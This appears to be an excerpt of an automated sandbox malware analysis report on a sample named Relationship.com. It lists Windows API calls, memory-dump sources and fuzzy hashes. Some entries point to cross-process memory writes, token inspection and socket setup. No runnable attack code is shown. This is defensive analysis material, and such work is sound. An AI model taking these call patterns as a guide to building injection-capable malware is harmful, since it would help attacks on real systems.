                                                                                                                                                                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C2D1B1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 336800556-0
                                                                                                                                                                                                                                                                            • Opcode ID: 7506833d316da27750597be5245f53355ee4744c686204c8639eba5da35a6022
                                                                                                                                                                                                                                                                            • Instruction ID: 384651f2e7d716bfe176022a6a515d90f98f17382b03f79a61761a97a6b1fdf9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7506833d316da27750597be5245f53355ee4744c686204c8639eba5da35a6022
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6101B1736056357F23216A666C8CE7F6A6DDED2B713140169BD06C2A80DA608D11D2B0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _memcmp
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2931989736-0
                                                                                                                                                                                                                                                                            • Opcode ID: 4c9dbc00b60aefbbc33982cf9831402e3c0e2128f7e52945264353f83b43e87e
                                                                                                                                                                                                                                                                            • Instruction ID: 753ff5a31565c23b68208f8ea79ccad14c2ac0b7fa72b613c76133ed88bd8fe0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4c9dbc00b60aefbbc33982cf9831402e3c0e2128f7e52945264353f83b43e87e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E01B5B56003057F9A1066215C42FAB735D9F92399B144021FE0A9B3C1E765EE98E2ED
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(0000000A,?,?,00C1F64E,00C1545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00C23170
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C231A5
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C231CC
                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00C231D9
                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00C231E2
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C50831,80070057,?,?,?,00C50C4E), ref: 00C5091B
                                                                                                                                                                                                                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C50831,80070057,?,?), ref: 00C50936
                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C50831,80070057,?,?), ref: 00C50944
                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C50831,80070057,?), ref: 00C50954
                                                                                                                                                                                                                                                                            • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C50831,80070057,?,?), ref: 00C50960
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 00C5F2AE
                                                                                                                                                                                                                                                                            • QueryPerformanceFrequency.KERNEL32(?), ref: 00C5F2BC
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 00C5F2C4
                                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 00C5F2CE
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32 ref: 00C5F30A
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C51A60
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,00C514E7,?,?,?), ref: 00C51A6C
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C514E7,?,?,?), ref: 00C51A7B
                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C514E7,?,?,?), ref: 00C51A82
                                                                                                                                                                                                                                                                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C51A99
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C51976
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C51982
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C51991
                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C51998
                                                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C519AE
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 44706859-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C51916
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C51922
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C51931
                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C51938
                                                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C5194E
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 44706859-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00C60B24,?,00C63D41,?,00000001,00C33AF4,?), ref: 00C60CCB
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00C60B24,?,00C63D41,?,00000001,00C33AF4,?), ref: 00C60CD8
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00C60B24,?,00C63D41,?,00000001,00C33AF4,?), ref: 00C60CE5
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00C60B24,?,00C63D41,?,00000001,00C33AF4,?), ref: 00C60CF2
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00C60B24,?,00C63D41,?,00000001,00C33AF4,?), ref: 00C60CFF
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00C60B24,?,00C63D41,?,00000001,00C33AF4,?), ref: 00C60D0C
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00C565BF
                                                                                                                                                                                                                                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 00C565D6
                                                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 00C565EE
                                                                                                                                                                                                                                                                            • KillTimer.USER32(?,0000040A), ref: 00C5660A
                                                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000001), ref: 00C56624
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3741023627-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2DAD2
                                                                                                                                                                                                                                                                              • Part of subcall function 00C22D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00C2DB51,00CC1DC4,00000000,00CC1DC4,00000000,?,00C2DB78,00CC1DC4,00000007,00CC1DC4,?,00C2DF75,00CC1DC4), ref: 00C22D4E
                                                                                                                                                                                                                                                                              • Part of subcall function 00C22D38: GetLastError.KERNEL32(00CC1DC4,?,00C2DB51,00CC1DC4,00000000,00CC1DC4,00000000,?,00C2DB78,00CC1DC4,00000007,00CC1DC4,?,00C2DF75,00CC1DC4,00CC1DC4), ref: 00C22D60
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2DAE4
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2DAF6
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2DB08
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2DB1A
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                                                            • Opcode ID: da9c4b83755836cf96b8301daa0e794ca584637607f754fbfd155495a71d865c
                                                                                                                                                                                                                                                                            • Instruction ID: 1ec6e407be6769bb5eabf8078e1a085b8d27d9e94859336db0758f0ad236a439
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: da9c4b83755836cf96b8301daa0e794ca584637607f754fbfd155495a71d865c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F2F01D32584225BB8624EB68F986E1A77EDEE14721BA50C05F01BD7D41DB31FD80DAA4
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2262E
                                                                                                                                                                                                                                                                              • Part of subcall function 00C22D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00C2DB51,00CC1DC4,00000000,00CC1DC4,00000000,?,00C2DB78,00CC1DC4,00000007,00CC1DC4,?,00C2DF75,00CC1DC4), ref: 00C22D4E
                                                                                                                                                                                                                                                                              • Part of subcall function 00C22D38: GetLastError.KERNEL32(00CC1DC4,?,00C2DB51,00CC1DC4,00000000,00CC1DC4,00000000,?,00C2DB78,00CC1DC4,00000007,00CC1DC4,?,00C2DF75,00CC1DC4,00CC1DC4), ref: 00C22D60
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C22640
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C22653
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C22664
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C22675
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                                                            • Opcode ID: e3a2afeb8a35f1b713da80211537c754fae057af75cd848104622f97b75c8128
                                                                                                                                                                                                                                                                            • Instruction ID: e994c3dd7b806dde3dc93813d44860c49d9913964eee81a3a524cf11799e2526
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e3a2afeb8a35f1b713da80211537c754fae057af75cd848104622f97b75c8128
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3EF0FEB1841231AB8B12AF95FC01F4C3B64FF257627490A1AF815D66B5DB364901FFC4
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: __freea$_free
                                                                                                                                                                                                                                                                            • String ID: a/p$am/pm
                                                                                                                                                                                                                                                                            • API String ID: 3432400110-3206640213
                                                                                                                                                                                                                                                                            • Opcode ID: 038cc3cc960952993e3895037344b46e8420442462dd78dcb1afd53969802b96
                                                                                                                                                                                                                                                                            • Instruction ID: 62cbaa0037c7bb378431f975bd994857eac8a11f507fdeec2817c8075f16ae3c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 038cc3cc960952993e3895037344b46e8420442462dd78dcb1afd53969802b96
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43D11275900226DACB249F68E845BFEB7B1FF65700F2C015AED269BE50D7358E80CB90
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C52B1D,?,?,00000034,00000800,?,00000034), ref: 00C5BDF4
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00C530AD
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C52B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 00C5BDBF
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 00C5BD1C
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C52AE1,00000034,?,?,00001004,00000000,00000000), ref: 00C5BD2C
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C52AE1,00000034,?,?,00001004,00000000,00000000), ref: 00C5BD42
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C5311A
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C53167
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                                                                            • API String ID: 4150878124-2766056989
                                                                                                                                                                                                                                                                            • Opcode ID: 7477b329601f363ad6cebdceffbd82ac6648348c63930769cdd6e0e31772db20
                                                                                                                                                                                                                                                                            • Instruction ID: bcf23ff374a022fa36d19f47a28638d974321774bf5c8a9eb479ce44c29a6036
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7477b329601f363ad6cebdceffbd82ac6648348c63930769cdd6e0e31772db20
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0C414676900218AFDB10DBA4CD81AEEBBB8EF49741F004095FA55B7184DA706F89DBA4
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\523266\Relationship.com,00000104), ref: 00C21AD9
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C21BA4
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C21BAE
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\523266\Relationship.com
                                                                                                                                                                                                                                                                            • API String ID: 2506810119-2986333598
                                                                                                                                                                                                                                                                            • Opcode ID: b0f7a2d87616b1b9504b7b5debe6610d3c4d2cd151ef26baa7830ca3a8e62a67
                                                                                                                                                                                                                                                                            • Instruction ID: ae298d5774a42ea5878b3650cbd92cd9af1c7d2e4c0ae735722926b8f107d902
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b0f7a2d87616b1b9504b7b5debe6610d3c4d2cd151ef26baa7830ca3a8e62a67
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FA3162B1A00228EFCB21DF99EC85E9EBBFCEB95710B1841A6FC1497611E6704F41DB90
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00C5CBB1
                                                                                                                                                                                                                                                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 00C5CBF7
                                                                                                                                                                                                                                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00CC29C0,01586E98), ref: 00C5CC40
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Menu$Delete$InfoItem
                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                            • API String ID: 135850232-4108050209
                                                                                                                                                                                                                                                                            • Opcode ID: 8e53dd0d785a71e92a0d7d282b59b2e42e91e5704a1593f1f8028cb79e98b345
                                                                                                                                                                                                                                                                            • Instruction ID: 6b9f28866b20be7538e4057df36f8457849c586f700c5442fe15439aad15d049
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8e53dd0d785a71e92a0d7d282b59b2e42e91e5704a1593f1f8028cb79e98b345
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1941D4792043019FD720DF28D8C5B1AB7E4EF85715F04461EF9A9972D1C730E988CB5A
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00C8DCD0,00000000,?,?,?,?), ref: 00C84F48
                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32 ref: 00C84F65
                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00C84F75
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$Long
                                                                                                                                                                                                                                                                            • String ID: SysTreeView32
                                                                                                                                                                                                                                                                            • API String ID: 847901565-1698111956
                                                                                                                                                                                                                                                                            • Opcode ID: d5cb709e42a427905e984fd6679d6349de036c66d6d9e05cff06ddae85b9d858
                                                                                                                                                                                                                                                                            • Instruction ID: 3a1bff9b0d5a64b080325bbd6d5da659c4ae0af7a06946f89ee6e50e624b44d8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d5cb709e42a427905e984fd6679d6349de036c66d6d9e05cff06ddae85b9d858
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2631B23111020AAFDB249F78CC45BEA77A9EF08338F214729FA75931D0D770AD509B54
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00C73DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00C73AD4,?,?), ref: 00C73DD5
                                                                                                                                                                                                                                                                            • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C73AD7
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C73AF8
                                                                                                                                                                                                                                                                            • htons.WSOCK32(00000000,?,?,00000000), ref: 00C73B63
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
